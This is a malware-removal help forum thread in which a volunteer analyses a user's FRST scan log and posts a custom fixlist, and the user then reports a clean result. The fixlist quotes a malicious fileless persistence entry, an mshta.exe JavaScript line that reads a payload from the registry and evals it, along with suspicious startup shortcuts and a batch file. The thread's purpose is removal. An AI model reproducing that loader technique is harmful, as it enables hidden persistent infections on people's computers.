FirewallRules: [{D1B0DA6F-7B5B-4315-A67D-24ECBB94C1C5}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{AD31503D-909F-4888-936F-CC29416D7CCB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{CDC7E368-6005-496A-A69A-40B7541B81C3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0493D9A8-9276-4936-9C6C-27A954D94C1F}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1E40B6CA-B6C6-485A-9AD5-CC1D6F3C867F}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{82C256A0-1CC6-4688-9824-FF3D6A876EEA}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{89031E60-A611-4C71-B272-E99C16C29AC3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{D2A7D690-91F3-4534-8D9A-DAE6026D8B1A}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{6689BF1B-2209-4701-A948-71F52BE44B97}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{AFBD6B65-616A-4963-8AEC-7DEDF9F8EFC0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3A12B802-2B08-4E1D-9AAD-053A47B92A7B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [UDP Query User{D2A45460-C60F-463B-8DF8-30DE7EED949E}C:\users\harold\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\harold\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{9B93A8E0-6E2C-4F2F-BE53-80FA46F7DEE0}C:\users\harold\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\harold\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{2CA76AA4-B6D1-442A-916F-303A759B7162}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{F521F223-0CB3-4E1D-A4CF-747445576C5E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{DC4A9BF3-85F0-498A-83E2-C05E3DFD4B00}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{3418E0C3-9127-4DC0-88CB-D53740BD9D10}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{295ED039-2C1C-4DF4-84F4-A8AA0C915CFC}] => (Allow) C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{A56D746F-D9BF-4C0D-B1EF-D204E1C3DB57}] => (Allow) C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [UDP Query User{F1436E84-24DC-4C4E-AAB6-16FC56CFEE2C}C:\users\harold\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\harold\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{CA49EE30-1DB1-4766-9506-68A6B0FEA7C1}C:\users\harold\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\harold\appdata\local\akamai\netsession_win.exe
FirewallRules: [{B10F09BF-DBEF-4011-9B42-A65CBE4788F5}] => (Allow) C:\Users\Harold\AppData\Local\Akamai\netsession_win.exe
FirewallRules: [{9967C61C-8A0C-41FC-81E0-2526CF94BCC2}] => (Allow) C:\Users\Harold\AppData\Local\Akamai\netsession_win.exe
FirewallRules: [{B93EED00-1AE6-4C18-ABCF-03DDD3E46F96}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{69B532F5-1028-4689-BC4E-0EC145A49DE5}] => (Allow) LPort=1900
FirewallRules: [{76819FC8-FC1A-4F12-B924-3C8E0D991D73}] => (Allow) LPort=2869
FirewallRules: [{13793C8A-94F4-4922-95E9-B8E495521BF7}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{9935848D-5C5B-40D5-B00B-759C2FEAAA46}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\RoxioNow\RNow.exe
FirewallRules: [{A043FA11-6C26-4E9F-B0DF-7DBE66AD5E49}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\RoxioNow\RNow.exe
FirewallRules: [{08EF55C6-09D5-4760-B23F-B72CA5395803}] => (Allow) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowShell.exe
FirewallRules: [{112EE17F-BD1C-477A-8638-204E4289D31C}] => (Allow) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowShell.exe
FirewallRules: [{E0B7F5D2-5C91-4A1F-89DE-DA6091F85C47}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Music\HPTouchSmartMusic.exe
FirewallRules: [{C8077DF7-39A9-4AA3-9C51-6680947D940E}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\Video\HPMediaSmartVideo.exe
FirewallRules: [{4D31F622-50B1-46F4-B3B2-5AAFE086B9CA}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\MediaSmart\Photo\HPMediaSmartPhoto.exe
FirewallRules: [{0E164A7D-3795-4A54-A177-79B97333C664}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPDVDSmart.exe
FirewallRules: [{C3754D26-2A24-4C2B-81AD-F5B243F61534}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{9530F6FA-89C5-48D6-B9C2-6A672501F320}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\TSMAgent.exe
FirewallRules: [{C47FE2AD-EC2E-4230-8E43-6FC40AB0239F}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartVideo.exe
FirewallRules: [{F31D01A8-A670-4477-BBDA-BD9225ECC8F0}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartPhoto.exe
FirewallRules: [{8C5469AA-EE53-4B4D-B9AD-1B12114278AB}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartMusic.exe
FirewallRules: [{ED6557CF-E2B5-4AFF-B4F0-CC83F2C579A2}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDirector\PDR8.EXE
FirewallRules: [{ED391711-A77E-49C7-AB09-69EDF1943FFA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DF5956B1-6834-40DB-99BD-1FDB4FA106F4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B289C545-A0E2-4A89-AFA2-8FF4BE42C0C5}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal TV Server\TvService.exe
FirewallRules: [{F72701FE-38CA-4D50-A820-08923605C312}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal TV Server\TvService.exe
FirewallRules: [{0411946A-CC7B-477F-B863-E6E96CBD87CB}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal TV Server\SetupTv.exe
FirewallRules: [{6C214F1C-6F99-4CD2-AF90-3B22115BF512}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal TV Server\SetupTv.exe
FirewallRules: [{C26ED18F-51A8-4E7D-B2E6-C7E646D3C9B6}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal\MediaPortal.exe
FirewallRules: [{AE90B585-B953-4349-B2FA-E9416A1FC895}] => (Allow) C:\Program Files (x86)\Team MediaPortal\MediaPortal\MediaPortal.exe
FirewallRules: [{806AABEA-7D43-439C-A8EF-2C4C03E5417D}] => (Allow) LPort=3306

==================== Restore Points =========================

20-10-2016 10:08:15 Windows Update
23-10-2016 19:05:00 Windows Backup
29-10-2016 14:33:15 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/30/2016 03:46:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 49.0.2.6136, time stamp: 0x5807c043
Faulting module name: mozglue.dll, version: 49.0.2.6136, time stamp: 0x5807b9a7
Exception code: 0x80000003
Fault offset: 0x0000e83e
Faulting process id: 0x33ac
Faulting application start time: 0x01d232e61960eb20
Faulting application path: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
Faulting module path: C:\Program Files (x86)\Mozilla Firefox\mozglue.dll
Report Id: 3289c41e-4b0c-408c-b315-31dc62fb33be
Faulting package full name:
Faulting package-relative application ID:

Error: (10/29/2016 07:20:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_ProfSvc, version: 10.0.14393.0, time stamp: 0x57899b1c
Faulting module name: combase.dll, version: 10.0.14393.187, time stamp: 0x57cf994f
Exception code: 0xc0000005
Fault offset: 0x00000000000aed6c
Faulting process id: 0x424
Faulting application start time: 0x01d22d3df4522a84
Faulting application path: C:\WINDOWS\system32\svchost.exe
Faulting module path: C:\WINDOWS\System32\combase.dll
Report Id: 52919579-0d14-488b-a894-748072c7029f
Faulting package full name:
Faulting package-relative application ID:

Error: (10/29/2016 06:51:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: Family-HP)
Description: Package Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Error: (10/29/2016 06:28:18 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Family-HP)
Description: Activation of app Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/29/2016 02:34:23 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (10/29/2016 01:49:52 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Family-HP)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/29/2016 08:12:11 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4610

Error: (10/29/2016 08:12:11 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 4610

Error: (10/29/2016 08:12:11 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (10/29/2016 08:12:10 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 3094


System errors:
=============
Error: (10/30/2016 06:36:49 PM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY)
Description: A corruption was discovered in the file system structure on volume OS.

The exact nature of the corruption is unknown.  The file system structures need to be scanned online.

Error: (10/30/2016 05:42:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 and APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (10/30/2016 05:41:53 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NetTcpActivator service depends on the NetTcpPortSharing service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (10/30/2016 05:37:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading

Error: (10/30/2016 05:37:38 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Harold\AppData\Local\Temp\ehdrv.sys

Error: (10/30/2016 05:37:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading

Error: (10/30/2016 05:37:37 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Harold\AppData\Local\Temp\ehdrv.sys

Error: (10/30/2016 05:37:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading

Error: (10/30/2016 05:37:37 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Harold\AppData\Local\Temp\ehdrv.sys

Error: (10/30/2016 05:37:36 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
This driver has been blocked from loading


==================== Memory info ===========================

Processor: AMD Phenom™ II X6 1045T Processor
Percentage of memory in use: 45%
Total physical RAM: 8183.89 MB
Available physical RAM: 4468.89 MB
Total Virtual: 8695.89 MB
Available Virtual: 4491.88 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:917.38 GB) (Free:379.23 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:13.41 GB) (Free:1.64 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (DATA_DRIVE_1) (Fixed) (Total:931.51 GB) (Free:79.91 GB) NTFS
Drive l: (FreeAgent Drive) (Fixed) (Total:931.51 GB) (Free:171.66 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.3 GB) (Disk ID: 8D95C33A)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=917.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=13.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: B0254860)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 7 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: CCCA59EF)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================



#4 dbrisendine

dbrisendine

  • Malware Response Team
  • 508 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:BC, Canada
  • Local time:10:50 AM

Posted 30 October 2016 - 07:59 PM

No problem on the double posting; someone already handled that.   Let's knock this thing out, OK?

If you have any questions or problems with these steps, please come back and ask for clarification until you are satisfied with the steps.

 

FIRST >>>>

Please go to START (Windows Orb) >> Control Panel >> Uninstall a Program or Programs and Features and remove the following (if listed):

QuickTime 7

To do so, left clicking on the name once and then click Uninstall/Change at the bar above the list window.  

Follow the prompts of the uninstaller BUT please read carefully any questions it asks before answering; some uninstallers will try and deceive you into keeping the software.


SECOND >>>>

Open notepad by pressing the Windows Key + R key, typing notepad in the Run box and pressing Enter.  Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt
 

Start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: iSkysoft iMedia Converter Deluxe 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\PROGRA~3\iSkysoft\VIDEOC~1\WSBROW~1.DLL => No File
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
FF user.js: detected! => C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js [2016-03-26]
FF Plugin HKU\S-1-5-21-1355648730-1136835254-2900194302-1001: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll [No File]
U3 idsvc; no ImagePath
Task: {182548B4-34C3-493B-9E25-80E7BECB6AEE} - System32\Tasks\{80D68447-CC1E-4AC0-8C98-D29AFA292270} => pcalua.exe -a C:\Users\Harold\Downloads\NOF-Essentials.exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {24CF2868-3518-4830-ADEB-81A5230BD173} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {2917EE86-583E-4CED-848E-79DC2A6287E0} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {426D89B7-22E3-4132-B434-C26049460A35} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {503702D7-8726-42F3-A652-BB92440B76A9} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {74960916-8CB4-4A24-9C21-266DBF7C1613} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {825A3C24-77CF-4714-9606-2BE4B48D1F62} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {C36A6DB5-4989-40D8-885A-EB418B1C97FD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {C6543766-4A8C-472F-8B19-CAFBF8CB18B7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {CD289DED-2CCC-46B1-B7A6-D863153BD078} - System32\Tasks\{126C6E32-44AE-45CB-BF8C-B9605C8636F6} => pcalua.exe -a L:\Setup.exe -d L:\
Task: {CFC27006-0508-4E5A-B01F-AE139D853F8C} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {D82A5397-CB31-4135-8EE6-A6301B2406D1} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {F2ADC65E-7099-42E2-B116-6BE9B5C5EED2} - System32\Tasks\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A} => pcalua.exe -a C:\Windows\system32\pcwrun.exe -c "C:\Program Files (x86)\NetObjects\NetObjects Fusion Essentials\Fusion.exe"
Task: {F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxps://apps.driversupport.com
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [**lbpxghqil<*>] => "C:\Users\Harold\AppData\Local\0d9f76\909634.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee: "C:\WINDOWS\system32\mshta.exe" "javascript:A8gDIF="gQr";A6C=new ActiveXObject("WScript.Shell");Zq58tMz="n";U0FdG=A6C.RegRead("HKCU\\software\\sdca\\hzqzf");Vo7QZ3="pCt64";eval(U0FdG);PlZSb8ur="l3m7Wyvw";" <===== ATTENTION
DeleteKey: HKCU\\software\\sdca
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk [2016-10-30]
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d433f5.lnk [2016-10-08]
Shortcut: C:\Users\Harold\AppData\Local\0d9f76\909634.lnk -> C:\Users\Harold\AppData\Local\0d9f76\2eb755.bat ()
2016-10-08 09:38 - 2016-10-16 17:32 - 00000000 ____D C:\Users\Harold\AppData\Local\0d9f76
2016-10-08 09:38 - 2016-10-08 09:38 - 00000000 ____D C:\Users\Harold\AppData\Roaming\dc130f
C:\Users\Harold\jagex_runescape_preferences.dat
C:\Users\Harold\jagex_runescape_preferences2.dat
C:\Windows\SysWOW64\000*.tmp
C:\Program Files\Internet Explorer\000*.tmp
C:\Program Files (x86)\Internet Explorer\000*.tmp
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end


NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Start FRST that is on the desktop by right clicking on file and selecting "Run as Administrator..." and press the Fix button just once and wait.

Press%20the%20FIX%20button_zpsdd5zi3mt.p

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.


LAST >>>>

Please download Malwarebytes Anti-Rootkit from here


  • Unzip the contents to a folder in a convenient location.
  • Open the folder where the contents were unzipped and run mbar.exe
  • Follow the instructions in the wizard to update and allow the program to scan your computer for threats.
  • Click on the Cleanup button to remove any threats and reboot if prompted to do so.
  • Wait while the system shuts down and the cleanup process is performed.
  • Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click Cleanup once more and repeat the process.
  • When done, please post the two logs produced they will be in the MBAR folder... mbar-log.txt and system-log.txt



Information to Reply with >>>>


  • Any problems with the uninstall?
  • The Fixlog.txt log file text posted.
  • The Malwarebytes AntiRootkit logs (you can attach these if you like as the system-log.txt can be quite large).
  • How is your system running now?  Any more alerts from Norton?

 

 


unite_blue_zpsba2e96f7.png
 
Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#5 brokus4

brokus4
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:12:50 PM

Posted 30 October 2016 - 08:05 PM

Look pretty strait forward. I am out of time tonight. I will do the above tomorrow night when I get home from work and let you know the results.

Thanks for the quick replies!



#6 dbrisendine

dbrisendine

  • Malware Response Team
  • 508 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:BC, Canada
  • Local time:10:50 AM

Posted 30 October 2016 - 08:34 PM

Cool; I think you'll be pleased.  I'll be looking for your reply tomorrow.


unite_blue_zpsba2e96f7.png
 
Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#7 brokus4

brokus4
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:12:50 PM

Posted 31 October 2016 - 08:45 PM

Okay, I've spent the last few hours following your directions (the scans took a long time) and everything seems to check out. Norton is not showing any alerts! So from my perspective it appears to have been eradicated, but I have included the Fixlog log file as directed, so hopefully you can tell me if am incorrect.

 

You instructed me to go ahead and attach the Malwarebytes log files, but I don't see a way to attach files to this thread, so unfortunately they are not included here. I be happy to send them to you if I could figure out how or if you could tell me how.

 

Thanks much!

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 30-10-2016
Ran by Harold (31-10-2016 18:04:56) Run:1
Running from C:\Users\Harold\Desktop
Loaded Profiles: Harold & DefaultAppPool (Available Profiles: Harold & Sue & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
